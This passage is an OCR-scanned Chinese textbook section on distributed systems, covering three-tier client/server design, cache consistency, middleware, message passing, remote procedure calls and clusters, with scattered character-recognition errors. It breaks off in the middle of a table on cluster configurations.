为 中 心 的 方式 ， 常 常 是 使 公司 范围 的 应 用 程序 从 大 型 机 环境 迁移 到 分 布 式 环境 的 途径 。 


三 层 客 户 /服务 器 结构 

传统 客户 /服务 器 结构 包括 两 级 〈 或 称 两 层 ): 客户 层 和 服务 器 层 。 近年 来 ,一 种 三 层 结 构 的 
模型 变 得 日 益 普遍 ( 见 图 16.6 )。 在 这 种 结构 中 , 应 用 软件 分 布 在 三 种 类 型 的 机 器 上 : 用 户 机 器 、 
中 间 层 服务 器 以 及 后 端 服务 器 。 用 户 机 器 是 客户 机 ， 前 面 已 经 讨论 过 , 在 三 层 式 模 型 中 , 它 一 般 
是 一 种 着 型 客户 机 。 中 间 层 机 器 基本 上 是 位 于 用 户 客户 和 很 多 后 端 数据 库 服 务 器 之 间 的 网 关 。 中 
间 层 机 器 能 够 转换 协议 , 将 一 种 类 型 的 数据 库 系统 映像 为 另 一 种 类 型 数据 库 的 查询 。 男 外 ,中 间 
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层 机 器 能 够 融合 来 自 不 同 数据 源 的 结果 。 最 后 , 中 间 层 机 器 因 其 介 于 两 个 层次 之 间 而 可 以 充当 桌 
面 应 用 程序 和 后 端 应 用 程序 之 间 的 网 关 。 

在 中 间 层 服务 器 和 后 端 服务 器 之 间 的 交互 也 遵从 客户 /服务 器 的 模式 ， 因此 ， 中 间 层 系统 同 
时 充当 着 客户 和 服务 器 。 


文件 高 速 缓存 的 一 致 性 

当 使 用 文件 服务 器 时 , 文件 IO 的 性 能 相对 于 本 地 文件 访问 具有 显著 的 下 降 , 原因 是 网 络 带 
来 的 延迟 .为 了 减轻 这 种 性 能 下 降 , 独 立 系统 可 以 使 用 文件 高 速 比 存 来 保存 最 近 访问 的 文件 记录 。 
由 于 局 部 性 原理 ， 使 用 本 地 文件 高 速 缓 存 可 以 减少 必须 进行 的 远程 服务 器 护 问 次 数 。 

16.7 描述 了 一 种 典型 的 分 布 机 制 ， 用 于 在 互联 的 工作 站 组 上 缓存 文件 。 当 进程 要 访问 文 
件 时 ,访问 请 求 首先 提交 到 进程 所 在 的 工作 站 的 高 速 缓 存 中 (“文件 通路 ”)， 如 果 在 那里 没有 找 
到 ， 则 该 请 求 传递 给 本 地 磁盘 (“磁盘 通路 ”) 一 一 如 果 文 件 存储 在 本 地 磁盘 上 ， 或 者 传递 给 文件 
服务 器 (“ 服 务 器 通路 ”) 一 一 文件 的 真正 存储 位 置 。 在 服务 器 端 ， 首先 询问 服务 器 上 的 高 速 缓存 ， 
如 果 没 有 命中 , 再 访问 服务 器 的 磁盘 。 这 种 双重 高 速 缓存 的 方法 用 于 减少 通信 和 量 ( 客户 高 速 缓存 ) 
和 磁盘 VO ( 服务 器 高 速 缓存 )。 






中 间 层 服务 器 
(应 用 程序 服务 器 ) 





(数据 服务 器 ) 
图 16.6 三 层 客 户 / 服 务 器 体系 结构 图 16.7 Sprite 系统 中 的 分 布 式 文件 高 速 缓 存 机 制 


当 高 速 缓存 中 总 能 含有 远程 数据 的 精确 副本 时 , 我 们 说 这 些 高 速 缓存 是 一 致 的 。 高 速 缓存 之 
间 可 能 会 变 得 不 一 致 , 这 是 因为 远程 数据 已 经 改变 , 而 相应 的 已 经 陈旧 的 本 地 高 速 缓存 副本 并 没 
有 被 废弃 。 当 客户 修改 了 也 被 其 他 客户 机 缓存 了 的 文件 时 , 这 种 情况 就 会 发 生 。 要 解决 这 个 问题 
实际 上 存在 两 个 层面 的 困难 。 如 果 客 户 采取 了 将 任何 变化 立即 写 回 服务 器 的 文件 中 的 策 路 , 则 任 
何 具有 该 文件 相关 部 分 的 高 速 缓存 副本 的 其 他 客户 机 将 具有 陈旧 的 数据 。 如 果 窜 户 将 变化 延迟 写 
ARS, 则 问题 就 更 糟 了 ， 因 为 服务 器 本 身 也 只 是 拥有 文件 的 旧版 本 , 且 对 服务 器 的 读 取 新 文 
件 请 求 得 到 的 可 能 也 是 陈旧 的 数据 。 使 本 地 高 速 缓存 副本 与 远程 数据 的 最 新 闻 步 更 新 的 问题 就 是 
高 速 缓存 一 致 性 问题 。 

解决 高 速 缓存 一 致 性 的 最 简单 的 方法 是 使 用 文件 锁 技 术 ， 以 防止 多 个 客户 对 文件 的 同时 访 
问 。 通 过 牺牲 系统 性 能 和 灵活 性 而 保证 了 一 致 性 。Sprite [NELS88，OUST88 ] 中 的 机 制 提供 了 
更 好 的 方法 , 任意 的 远程 进程 可 以 打开 一 个 文件 , 用 于 读 人 和 生成 它们 自己 的 客户 高 速 缓存 , 但 
是 如 果 一 个 针对 服务 器 的 打开 文件 请 求 要 求 写 人 访问 而 其 他 进程 都 是 为 读 访问 而 打开 这 个 文件 
的 ， 则 服务 器 要 采取 以 下 两 个 步骤 : 第 一 ， 它 告知 写 人 进程 ,尽管 它 保 留 了 一 个 高 速 缓存 ， 但 是 
必须 在 发 生 更 新 时 立即 写 回 所 有 改变 了 的 块 。 在 某 一 时 刻 ， 最 多 只 能 有 一 个 这 样 的 客户 。 第 二 ， 
服务 器 告知 所 有 打开 该 文件 的 读 进 程 ， 该 文件 已 不 再 是 可 缓存 的 了 。 
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16.1.3 ”中 间 件 


客户 /服务 器 产品 的 开发 和 使 用 ， 对 分 布 式 计算 的 标准 化 的 要 求 远 远 超出 人 们 的 想象 ， 这 要 
求 从 物理 层 一 直到 应 用 层 。 缺 乏 标准 化 使 得 实现 集成 的 、 多 厂商 的 、 企 业 范围 的 客户 /服务 器 配 
置 变 得 很 困难 ， 因 为 客户 /服务 器 方式 的 很 多 优势 都 是 与 其 模块 化 以 及 将 平台 和 应 用 程序 混合 、 
协调 起 来 提供 商业 解决 办 法 的 能 力 紧密 相连 的 ， 这 种 互 操作 性 的 问题 必须 得 到 很 好 的 解决 。 

为 了 实现 使 用 客户 /服务 器 方式 所 带 来 的 真正 优点 ， 开 发 者 必须 具备 一 组 能 提供 统一 的 方式 
和 和 方法 , 跨越 各 种 平台 访问 系统 资源 的 工具 。 这 使 程序 员 能 够 构建 这 样 的 应 用 程序 ; BABAR 
的 PC 机 和 工作 站 上 运行 的 差别 ， 而 且 无 论 数据 在 什么 位 置 都 使 用 相同 的 方法 来 访问 数据 。 

实现 这 一 要 求 的 最 常见 的 方法 是 ,在 上 层 应 用 程序 和 下 层 通信 软件 和 操作 系统 之 间 使 用 标准 
的 编程 接口 和 协议 。 这 种 标准 化 的 接口 和 协议 称 做 中 间 件 ( middleware )。 具 有 了 标准 的 编程 接 
O, 在 不 同类 型 的 服务 器 和 工作 站 上 实现 相同 的 应 用 就 很 容易 了 。 这 对 于 用 户 来 说 具有 明显 的 好 
处 , 而 厂商 也 受到 激发 来 提供 这 样 的 接口 。 原因 是 用 户 购买 的 是 应 用 程序 , 而 不 是 服务 器 ; BP 
将 只 选择 那些 运行 了 他 们 和 希望 的 应 用 程序 的 服务 器 。 需 要 有 标准 化 的 协议 来 将 这 些 不 同 的 服务 器 
接口 与 需要 访问 它们 的 客户 连接 起 来 。 

目前 已 经 有 了 很 多 中 间 件 软件 包 ,， 有 些 非常 简单 ， 有些 非常 复杂 。 它 们 所 共同 具有 的 特点 是 
能 隐藏 不 同 网 络 协 议和 操作 系统 的 复杂 性 和 不 一 致 性 。 客 户 机 和 服务 器 厂商 一 般 都 提供 了 很 多 非 
常 流行 的 中 间 件 软件 包 作 以 供 选择 。 这 样 , 用 户 可 以 采取 一 个 特定 中 间 件 策略 ， 然 后 从 各 种 厂商 
那里 集成 设备 来 支持 这 种 策略 。 


中 间 件 体系 结构 

图 16.8 给 出 了 在 客户 /服务 器 结构 中 中 间 件 的 作用 ， 中 间 什 息 件 的 确切 信用 将 到 决 于 所 使 用 
的 客户 /服务 器 计算 的 类 型 。 参见 图 16.5, 有 很 多 种 不 
同 的 客户 /服务 器 方式 , 这 取决 于 应 用 程序 的 功能 划分 
的 方式 。 无 论 怎样 划分 , 图 16.8 给 出 了 所 涉及 的 结构 
的 一 个 良好 的 一 般 性 描述 。 

注意 ， 中 间 件 具有 客户 端 组 件 和 服务 器 端 组 件 两 
个 部 分 ， 中 间 件 的 基本 目的 是 使 位 于 客户 端的 应 用 程 
序 或 用 户 能 够 访问 最 务 器 上 的 各 种 服务 ， 同 时 无 须 考 
虑 服务 器 之 间 的 区 别 。 对 于 特定 的 应 用 领域 ， 结 构 化 
查询 语言 (SQL ) 提供 了 本 地 或 远程 的 用 户 或 应 用 程 图 16.8 中间 件 在 客户 /服务 器 
序 访问 关系 数据 库 的 一 种 标准 访问 方式 。 然 而 ,很 多 体系 结构 中 的 作用 
关系 数据 库 厂商 都 对 SQL 进行 了 特定 的 扩展 ， 尽 管 他 们 都 支持 SQL。 这 样 ， 厂 商 的 产品 让 众多 
产品 有 所 差别 ， 但 也 会 产生 潜在 的 不 兼容 性 的 问题 。 

考虑 这 样 一 个 分 布 式 系统 的 例子 , 它 用 在 人 事 部 门 的 管理 中 。 基 本 的 职工 数据 例如 职工 姓名 、 
地 址 等 ， 可 能 存储 在 一 个 Gupta 数据 库 中 。 然 而 ， 工 资信 息 等 数据 可 能 存放 在 Oracle 数据 库 中 。 
当 人 事 部 的 一 位 用 户 请 求 访问 特定 记录 时 , 他 不 关心 哪 位 销售 商 的 数据 库 中 含有 所 需 的 数据 。 中 
间 件 提供 了 一 个 软件 层 , 支持 对 这 些 系统 的 统一 访问 。 从 逻辑 的 角度 而 不 是 从 实现 的 角度 来 观察 
中 间 件 的 作用 则 是 很 有 益 的 ， 这 种 观点 如 图 16.9 所 示 。 中 间 件 使 分 布 式 客户 /服务 器 计算 模式 所 
做 的 承诺 的 实现 成 为 可 能 。 整 个 分 布 式 系统 可 以 看 做 是 一 组 应 用 程序 和 用 户 可 用 资 源 的 集合 。 用 
户 无 须 关 心 数据 的 位 置 或 者 应 用 程序 的 实际 位 置 。 所 有 应 用 程序 操作 建立 在 一 个 统一 的 应 用 程序 
编程 接口 ( API) 之 上 。 中 间 件 贯穿 所 有 客户 和 服务 器 平台 ， 负 责 将 客户 请 求 定位 到 合适 的 服务 
器 上 。 
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尽管 已 经 出 现 很 多 中 间 件 产品 , 但 这 些 产 品 一 般 都 基于 以 下 两 种 底层 机 制 : 消息 传递 或 远程 
过 程 调 用 。 下 面 两 节 将 给 出 这 两 种 方法 的 分 析 。 








16.9 中 间 件 的 逻辑 视图 


16.2 分 布 式 消息 传递 


在 真实 的 分 布 式 处 理 系统 中 , 通常 计算 机 之 间 不 能 共享 存储 器 , 各 自 是 独立 的 计算 机 系统 。 
这 样 ， 基 于 共享 内 存 的 处 理 机 之 间 的 通信 技术 ,例如 信号 量 技术 等 都 无 法 使 用 。 取 而 代 之 的 是 
基于 消息 传递 的 技术 。 在 本 节 和 下 一 节 ， 我 们 分 析 两 种 最 常用 的 方法 。 第 一 种 是 消息 的 直接 应 
用 ， 因 为 它 处 于 同一 个 系统 中 ; 第 二 种 是 一 种 分 离 的 技术 ， 以 消息 传递 为 基本 功能 ， 叫 做 远程 
过 程 调用 。 

图 16.10a 显示 了 使 用 分 布 式 消息 传递 来 实现 客户 /服务 器 功能 的 例子 。 一 个 客户 进程 请 求 某 
项 服务 〈 例如 读 文件 、 打 印 )， 它 将 含有 服务 请 求 的 消息 发 送 给 一 个 服务 器 进程 。 服 务 器 进程 接 
受 请 求 并 发 送 回 含 有 应 答 的 消息 。 在 最 简单 的 情况 下 ， 只 需要 两 种 功能 : 发 送 和 接收 。 发 送 功能 
指明 目的 地 和 所 包括 的 消息 内 容 。 接收 功能 说 明 从 哪里 得 到 消息 , 并 提供 一 个 缓冲 区 存储 到 达 的 
消息 。 

图 16.11 介绍 了 一 种 消息 传递 的 实现 方法 。 进 程 使 用 消息 传递 模块 的 服务 。 服 务 请 求 可 以 用 
原 语 和 参数 表示 。 原 语 说 明了 要 执行 的 功能 , 参数 用 于 传递 数据 和 控制 信息 。 原 语 的 实际 形式 依 
赖 于 消息 传递 软件 , 可 能 是 一 个 过 程 调用 , 或 者 它 本 身 可 能 是 传递 给 作为 操作 系统 某 个 部 分 的 进 
程 的 消息 。 

发 送 原 语 由 要 发 送 消息 的 进程 所 使 用 , 它 的 参数 是 目标 进程 标识 号 和 消息 的 内 容 , 消息 传递 
模块 构建 了 一 个 数据 单元 来 包含 这 两 个 元 素 。 该 数据 单元 通过 某 种 通信 机 制 ， 例 如 TCP/IP， 发 
送 给 运行 目标 进程 的 计算 机 。 当 数据 单元 被 目标 系统 接收 后 , 通过 通信 机 制 , 它 被 发 送 到 消息 传 
递 模块 。 该 模块 检测 进程 号 ， 并 将 消息 存储 在 缓冲 区 中 ， 以 便 进程 使 用 。 

在 这 个 例子 中 ,接收 进程 必须 通过 指定 一 个 缓冲 区 域 并 通过 接收 原 语 告诉 消息 传递 模块 其 正 
等 待 接收 消息 。 另 一 种 方法 不 需要 这 种 声明 ,而 是 当 消 息 传递 模块 接收 到 一 个 消息 ， 它 会 用 某 种 
接收 信号 来 告知 目标 进程 ， 然 后 将 接收 到 的 消息 放置 在 共享 缓冲 区 中 。 

许多 设计 方法 都 与 分 布 式 消息 传递 有 关 ， 在 本 节 的 其 余部 分 将 解决 这 些 问题 。 
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面向 消息 的 中 间 件 
与 特定 应 用 有 关 的 消息 《消息 队列 





客户 a) 面向 消息 的 中 间 件 


与 特定 应 用 有 关 的 
过 程 调 用 和 返回 





b ) 远程 过 程 调用 





c) 对 象 请 求 代理 





Sd 
进程 标识 | “消息 | 
Æ 16.10 中间 件 机 制 16.11 基本 的 消息 传递 原 语 


16.2.1 ”可 靠 性 与 不 可 靠 性 


如 果 可 能 的 话 , 可 靠 的 消息 传递 机 制 要 对 传输 正确 性 进行 保证 。 这 种 机 制 将 使 用 一 种 可 靠 的 
传输 协议 或 类 似 的 逻辑 , 并 且 要 执行 错误 检测 、 确 认 、 重 传 以 及 对 无 序 消息 的 重 排序 处 理 。 因 为 
传输 正确 性 是 有 保证 的 , 所 以 不 需要 让 发 送 进程 知道 消息 已 被 传输 。 然 而 ,如 果 为 发 送 进程 提供 
一 个 返回 确认 ,这 很 可 能 是 有 用 的 ,这 样 发 送 进程 就 知道 传输 已 经 开始 。 在 任何 一 种 机 制 中 ， 如 
果 传 输 失 败 〈 例 如， 持久 的 网 络 错误 、 目 标 系统 触 溃 )， 则 发 送 进程 会 被 告知 传送 失败 。 

另 一 种 极端 情况 , 消息 传递 机 制 可 能 仅仅 是 将 消息 发 送 到 通信 网络 上 , 而 不 报告 发 送 成 功 或 
失败 。 这 种 方式 极 大 地 减少 了 消息 传递 的 复杂 性 以 及 处 理 步骤 和 通信 开销 。 对 于 那些 需要 确认 消 
息 已 被 传输 的 应 用 ， 应 用 程序 本 身 可 以 使 用 请 求 和 应 答 消 息 来 满足 需求 。 


16.2.2 ”阻塞 与 无 阻塞 


如 采用 无 阻塞 原 语 或 异步 原 语 ， 进 程 不 会 因为 要 进行 发 送 或 接收 而 被 挂 起 。 这 样 ， 当 进程 发 
出 发 送 原 语 时 , 一 旦 消息 已 经 做 了 排队 或 拷贝 处 理 之 后 操作 系统 就 将 控制 返回 给 进程 。 如 果 没 有 
做 拷贝 处 理 , 发 送 进程 在 消息 传输 之 前 或 传输 时 对 消息 所 做 的 任何 改变 都 是 很 危险 的 。 当 消息 已 
被 传输 或 复制 到 安全 区 域 一 一 用 于 后 续 的 传输 处 理 ， 则 要 中 断 发 送 进程 , 告知 它 消息 缓冲 区 可 以 
重用 了 。 类 似 地 ,无 阻塞 的 接收 由 进程 来 发 布 ， 然 后 进程 继续 运行 。 当 消息 到 达 时 ， 通 过 中 断 来 
告知 进程 ， 或 者 通过 周期 性 地 轮 询 状态 来 告知 进程 。 

无 阻塞 的 原 语 为 进程 提供 了 对 消息 传递 机 制 高 效 而 灵活 的 使 用 ,这 种 方法 的 缺点 是 难于 测试 
和 调试 使 用 这 些 原 语 的 程序 。 问 题 的 不 可 再 现 性 与 时 间 顺 序 相关 性 往往 导致 产生 很 多 奇怪 而 麻烦 
的 问题 。 

另 一 种 方法 是 使 用 阻塞 方式 ,或 同步 原 语 。 阻 塞 发 送 直 到 消息 已 经 传输 (不 可 靠 性 服务 ) 或 
消息 已 经 发 送 且 已 接收 到 确认 〈 可 靠 性 服务 )， 才 将 控制 返回 给 发 送 进程 。 阻 塞 接收 直到 消息 已 
经 放置 在 分 配 的 缓冲 区 中 ， 才 返回 控制 。 
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16.3 ”远程 过 程 调用 


远程 过 程 调用 是 基本 的 消息 传递 模型 的 一 种 变化 形式 ,现在 这 是 一 种 广 为 接 受 的 在 分 布 式 系 
统 中 进行 通信 封装 的 基本 方法 。 该 技术 的 基本 要 素 是 允许 不 同 机 器 上 的 程序 使 用 简单 的 过 程 调用 
/返回 语义 进行 交互 ， 就 像 两 个 程序 在 同一 台 机 器 上 ， 即 远 过 程 调用 用 于 对 远程 服务 的 访问 。 这 
种 方法 的 普及 是 因为 以 下 一 些 优点 : 
1 ) 过 程 调用 是 广 为 接 受 、 使 用 和 理解 的 概念 。 
2 ) 远程 过 程 调用 的 使 用 使 得 远程 接口 可 被 说 明 为 一 组 指定 了 类 型 的 命名 操作 。 这 样 可 以 清 
楚 地 说 明 接口 ， 分 布 式 程序 可 静态 地 检测 类 型 错误 。 
3 ) 因为 已 经 说 明了 一 个 标准 的 、 精 确定 义 的 接口 ,因而 应 用 程序 的 通信 代码 可 以 自动 生成 。 
4 ) 因为 已 经 说 明了 一 个 标准 的 、 精 确定 义 的 接口 ， 因 而 开发 者 可 以 编写 能 够 在 计算 机 和 操 
作 系 统 之 间 移 动 却 几乎 不 需 修 改 和 重新 编程 的 客户 和 服务 器 模块 。 
远程 过 程 调用 机 制 可 以 看 做 是 对 可 靠 的 、 阻 塞 方式 的 消息 传递 的 改进 。 图 16.10b 给 出 了 整 
体 结构 , 图 16.12 给 出 了 更 详细 的 结构 。 调用 程序 产生 一 个 正常 的 过 程 调用 , 参数 在 本 身 机 器 上 。 
例如 ， 
CALL P(X, Y) 
这 里 了 表示 过 程 名 ，X 表 示 传 递 的 参数 ，Y 表示 返回 值 。 
在 另外 的 某 台 机 器 上 调用 一 个 远程 过 程 的 意图 对 用 户 而 言 可 能 是 透明 的 ， 也 可 能 是 不 透明 
的 。 一 个 哑 过 程 (或 stub 过 程 ) P 必须 在 调用 者 的 地 址 空间 中 或 者 在 调用 时 动态 与 它 链接 。 这 个 
过 程 生成 一 个 说 明 被 调用 的 过 程 的 消息 , 并 包括 调用 参数 , 然后 它 将 消息 发 送 到 远程 系统 并 等 待 
应 答 。 当 接收 到 应 答 后 ，stub 过 程 返回 调用 程序 并 提供 返回 值 。 





图 16.12 远程 过 程 调用 机 制 


在 远程 机 器 中 ， 另 一 个 stub 程序 与 调用 过 程 相 关联 。 当 有 消息 到 达 时 ， 消 息 将 被 检测 到 ， 
并 生成 一 个 本 地 的 CALL P(X， 站 。 这 个 远程 过 程 就 被 本 地 调用 ， 所 以 关于 在 哪里 找到 参数 、 栈 
状态 等 正常 的 假设 与 一 个 纯粹 的 本 地 过 程 调 用 的 情况 是 一 样 的 。 

许多 设计 方法 与 远程 过 程 调用 有 关 ， 这 些 在 本 节 的 其 余部 分 说 明 。 
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16.3.1 参数 传递 


大 多 数 编程 语言 都 允许 参数 作为 值 来 传递 ( 通过 值 调用 )， 或 作为 指向 存放 值 的 地 址 的 指针 
来 传递 (通过 引用 调用 )。 对 于 远程 过 程 调用 来 说 ， 通 过 值 来 调用 比较 简单 :只 需 简单 地 将 参数 
复制 到 消息 中 并 发 送 到 远程 系统 。 通 过 引用 调用 的 实现 就 更 困难 一 些 。 每 个 对 象 需要 一 个 唯一 的 、 
系统 范围 的 指针 ， 要 满足 这 种 要 求 所 引起 的 开销 可 能 会 得 不 偿 失 。 


16.3.2 参数 表示 


另 一 个 问题 是 如 何 表示 参数 并 将 其 放 在 消息 中 。 如 果 被 调用 的 程序 和 调用 程序 是 用 同一 种 编 
程 语言 编写 的 , 运行 在 相同 类 型 的 机 器 上 , 并 且 操作 系统 也 相同 , 则 参数 的 表示 可 能 不 存在 问题 。 
如 果 在 这 些 环节 上 存在 差别 , 则 在 数字 和 文本 的 表示 方式 上 就 很 可 能 存在 问题 。 如 果 使 用 了 完整 
的 通信 体系 结构 , 则 这 个 问题 可 以 在 表示 层 得 到 解决 。 然 而 , 采用 完整 的 通信 体系 结构 会 导致 较 
大 的 系统 开销 ,因此 远程 过 程 调用 的 设计 并 不 采用 这 种 通信 结构 而 自己 提供 基本 通信 方法 。 这 样 ， 
转换 的 责任 就 落 在 远程 过 程 调用 机 制 上 ( 例如， 参见 [ GIBB87 ] )。 

解决 这 一 问题 的 最 好 方法 是 为 普通 对 象 提供 一 个 标准 化 的 格式 , 例如 整 型 、 浮 点 数 、 字 符 和 
字符 串 , 这 样 , 任何 机 器 上 的 本 地 参数 都 可 以 转换 成 标准 化 的 表示 , 也 可 以 由 标准 化 的 表示 转换 
而 来 。 


16.3.3 客户 /服务 器 绑 定 


绑 定 说 明了 在 远程 过 程 和 调用 程序 之 间 将 怎样 建立 联系 。 当 两 个 应 用 程序 已 经 建立 了 一 个 逻 
辑 连接 并 准备 交换 命令 和 数据 时 ， 绑 定 就 形成 了 。 

非 永久 绑 定 表示 当 进 行 远 程 过程 调 用 时 ， 在 两 个 进程 间 建 立 逻 辑 连接 ， 并 且 只 要 有 返回 值 ， 
就 断 开 两 个 进程 间 的 连接 。 因 为 连接 需要 维持 两 端的 状态 信息 ,因此 需要 消耗 资源 , 非 永 久 绑 定 
类 型 用 于 保存 这 些 资 源 。 另 一 方面 , 建立 连接 所 带 来 的 开销 使 非 永 久 绑 定 对 同一 个 调用 者 频繁 调 
用 远程 过 程 的 情况 不 太 适 用 。 

对 于 永久 绑 定 , 即使 在 过 程 返回 后 , 为 远程 过 程 调用 而 建立 的 连接 也 仍然 维持 着 , 该 连接 可 
供 将 来 的 远程 过 程 调 用 使 用 。 如 果 经 过 一 个 指定 时 间 段 后 , 在 该 连接 上 没有 任何 动作 , 则 该 连接 
被 终止 。 对 于 对 远程 过 程 进行 多 次 重复 调用 的 应 用 程序 , 永久 绑 定 保持 着 逻辑 连接 , 并 支持 使 用 
同一 连接 进行 一 系列 的 调用 和 返回 。 


16.3.4 同步 和 异步 


同步 和 异步 远程 过 程 调用 的 概念 与 阻塞 和 无 阻塞 消息 的 概念 类 似 。 传 统 的 远程 过 程 调用 是 同 
步 的 ， 要求 调 用 进程 等 待 ， 直 到 被 调用 进程 产生 返回 值 。 因 此 同步 RPC 的 行为 非常 类 似 于 子 程 
序 调用 。 

同步 RPC 很 易于 理解 和 编程 ， 因 为 它 的 行为 是 可 以 预期 的 。 然 而 ， 它 没 能 充分 发 挥 分 布 式 
应 用 中 固有 的 并 行 性 ， 这 就 限制 了 分 布 式 应 用 所 能 具有 的 交互 性 ， 降 低 了 性 能 。 

为 了 提供 更 大 的 灵活 性 ， 各 种 异步 RPC 机 制 已 经 得 到 实现 ， 以 获得 更 大 程度 的 并 行 性 而 同 
时 又 保留 了 RPC 的 通俗 性 和 简易 性 [ ANAN92 ]。 异 步 RPC 并 不 阻塞 调用 者 ， 应 答 也 可 以 在 需 
要 它们 时 接收 到 ， 这 使 客户 在 本 地 的 执行 可 以 与 对 服务 器 的 调用 并 行进 行 。 

典型 的 异步 RPC 使 用 情况 是 使 客户 反复 地 调用 服务 器 ， 在 某 一 时 刻 在 流水 线 上 排列 了 很 多 
请 求 ， 每 个 请 求 拥 有 自己 的 一 组 数据 。 客 户 和 服务 器 之 间 的 同步 可 以 通过 以 下 两 种 方式 来 实现 : 

1) 客户 和 服务 器 上 的 一 个 更 高 层 应 用 程序 来 启动 交换 ， 最 后 检测 所 有 请 求 的 行为 是 否 都 已 

经 执行 。 
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2) 客户 可 以 发 出 一 串 异步 的 RPC， 最 后 跟着 一 个 同步 RPC。 服 务 器 只 有 在 完成 了 所 有 的 异 
步 RPC 所 请 求 的 工作 后 才 应 答 最 后 那个 同步 RPC. 
在 某 些 方案 中 ， 异 步 RPC 不 需要 来 自 服务 器 的 应 答 ， 服 务 器 也 不 能 发 送 应 答 消 息 。 其 他 方 
案 或 者 要 求 应 答 ， 或 者 允许 应 答 ， 但 调用 者 并 不 等 待 应 答 。 


16.3.5 面向 对 象 机 制 


随 着 面向 对 象 技 术 在 操作 系统 的 设计 中 变 得 日 益 普遍 ， 客 户 / 服 务 器 程序 设计 者 已 经 开始 使 
用 这 种 方法 。 在 这 种 方法 中 , 客户 和 服务 器 在 对 象 之 间 来 回 传递 消息 。 对 象 通信 可 能 基于 一 个 下 
层 的 消息 或 RPC 结构 或 操作 系统 中 面向 对 象 功 能 之 上 直接 开发 的 技术 。 

需要 服务 的 客户 向 对 象 请 求 代 理发 送 一 个 请 求 ,对 象 请 求 代理 就 像 在 网 络 上 可 用 的 所 有 远程 
服务 的 一 个 目录 (MÆ 16.10c )。 代 理 调 用 相应 的 对 象 并 传送 有 关 的 数据 。 然 后 远程 对 象 对 该 请 
求 进行 服务 并 反馈 回 代理 ， 代 理 又 将 应 答 返 回 客户 。 

面向 对 象 方法 的 成 功 依赖 于 对 象 机 制 的 标准 化 。 遗憾 的 是 , 在 这 一 领域 存在 许多 相互 竞争 的 
设计 方法 。 一 种 是 微软 的 公共 对 象 模 型 ( Component Object Model, COM), EERE MK 
A (Object Linking and Embedding, OLE) 的 基础 。 与 之 竞争 的 另 一 种 方法 是 由 对 象 管 理 组 织 开 
发 的 公共 对 象 请 求 代理 体系 结构 ( Common Object Request Broker Architecture, CORBA )， 它 具 
有 很 广泛 的 产业 支持 ，IBM、Apple、Sun 以 及 很 多 其 他 制造 商都 支持 CORBA 方法 。 


16.4 集群 


计算 机 系统 设计 的 一 个 最 热门 的 新 领域 是 集群 技术 。 集 群 技术 与 对 称 多 处 理 技术 (SMP ) 是 
相对 的 , 这 种 方法 提供 了 高 性 能 和 高 可 用 性 , 并 对 服务 器 应 用 尤其 具有 吸引 力 。 我 们 可 以 将 集群 
定义 为 一 组 互联 的 完整 计算 机 , 一 起 作为 统一 的 计算 资源 而 工作 , 给 人 以 一 台 机 器 的 感觉 。 完整 
的 计算 机 表示 该 系统 离开 了 集群 之 后 ,自己 仍 可 独立 地 运行 。 在 文献 中 , 集群 中 的 每 台 计 算 机 一 
般 都 作为 一 个 节点 。 
[ BREW97 ] 列 出 了 可 以 使 用 集群 获得 的 4 个 优点 ， 这 些 也 可 以 当做 目标 或 设计 要 求 : 
e 完全 的 可 伸缩 性 : 可 以 创建 大 型 的 集群 ， 获 得 远 远 超过 即使 是 最 大 的 独立 计算 机 的 计算 
能 力 。 一 个 集群 可 以 具有 数 几 十 台 甚 至 数 百 台 机 器 ， 每 台 机 器 都 可 以 是 多 处 理 机 。 

@ 增加 的 可 伸缩 性 : 集群 可 以 这 样 来 配置 , 即 当 向 集群 中 添加 系统 时 只 需 很 小 的 额外 工作 ， 
也 就 是 用 户 可 以 在 一 个 适度 大 小 的 系统 上 开始 工作 ， 当 需求 增加 时 可 以 扩展 系统 ， 而 不 
用 通过 主体 升级 使 已 有 的 较 小 系统 由 一 个 较 大 的 系统 所 代替 。 

e 高 可 用 性 : 因为 集群 中 的 每 个 节点 都 是 一 台独 立 的 计算 机 ， 所 以 某 一 个 节点 的 故障 并 不 

意味 着 服务 的 失败 。 在 很 多 产品 中 ,软件 能 够 自动 地 进行 容错 处 理 。 

o 卓越 的 性 能 价格 比 : 使 用 普通 的 计算 机 来 构建 集群 系统 ， 能 够 以 非常 低 的 价格 ， 获 得 与 

一 台大 型 计算 机 相同 或 比 其 更 大 的 计算 能 力 。 


16.4.1 集群 的 配置 


在 文献 中 , 集群 有 很 多 种 不 同 的 分 类 方法 。 也 许 最 简单 的 分 类 方法 是 基于 集群 中 的 计算 机 是 
否 共 享 对 同一 磁盘 的 访问 。 图 16.13a 给 出 了 一 个 有 两 个 节点 的 集群 ， 仅 有 的 互联 是 通过 高 速 链 
接 的 方式 ， 通 过 消息 交换 来 协调 集群 的 行为 。 该 链接 可 以 是 与 其 他 非 集群 计算 机 共享 的 局 域 网 ， 
局 域 网 并 不 是 集群 系统 的 一 部 分 或 者 也 可 以 是 专用 的 互联 设施 。 对 于 后 者 , 集群 中 的 一 台 或 多 台 
计算 机 将 具有 到 局 域 网 或 广域网 的 链接 , 以 使 在 服务 器 集群 和 远程 客户 系统 之 间 具 有 连接 。 请 注 
意 ， 图 中 的 每 台 计 算 机 都 作为 多 处 理 机 来 描述 ， 这 并 不 是 必需 的 ， 但 却 增强 了 性 能 和 可 用 人 性。 
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高 速 消息 链 






a) 不 共享 磁盘 的 双 服 务 器 


高 速 消息 链接 


b) 共享 磁盘 
16.13 ”集群 配置 


在 图 16.13 中 描述 的 简单 分 类 方法 中 ， 另 一 种 是 共享 磁盘 的 集群 。 这 种 情况 一 般 在 节点 之 间 
仍 存在 一 个 消息 链接 。 另 外 ， 还 有 一 个 磁盘 子 系统 直接 与 集群 中 的 多 台 计 算 机 相连 。 在 图 16.13 
H, 公共 磁盘 子 系统 是 一 个 RAID KH. RAID 或 某 些 类 似 的 元 余 磁 盘 技 术 的 使 用 在 集群 中 是 很 
普遍 的 ， 这 样 ， 从 多 台 计 算 机 并 存 所 获得 的 高 可 用 性 就 不 会 受到 作为 单一 故障 点 的 共享 磁盘 的 
威胁 。 

可 以 通过 对 功能 选择 的 考察 来 获得 集群 选项 范围 的 一 个 更 清晰 的 认识 。 惠普 白皮书 [ HP96 | 
根据 功能 提供 了 一 种 有 用 的 分 类 方法 ( SLR 16.2 )。 


表 16.2 MAAK: 优点 和 缺陷 


易于 实现 










代价 高 ， 因 为 从 服务 器 对 
.于 其 他 要 处 理 的 任务 来 说 是 
不 可 用 的 


当主 服务 器 出 现 故障 时 ， 由 从 服务 
器 来 接管 


减少 了 一 些 代价 ， 因 为 
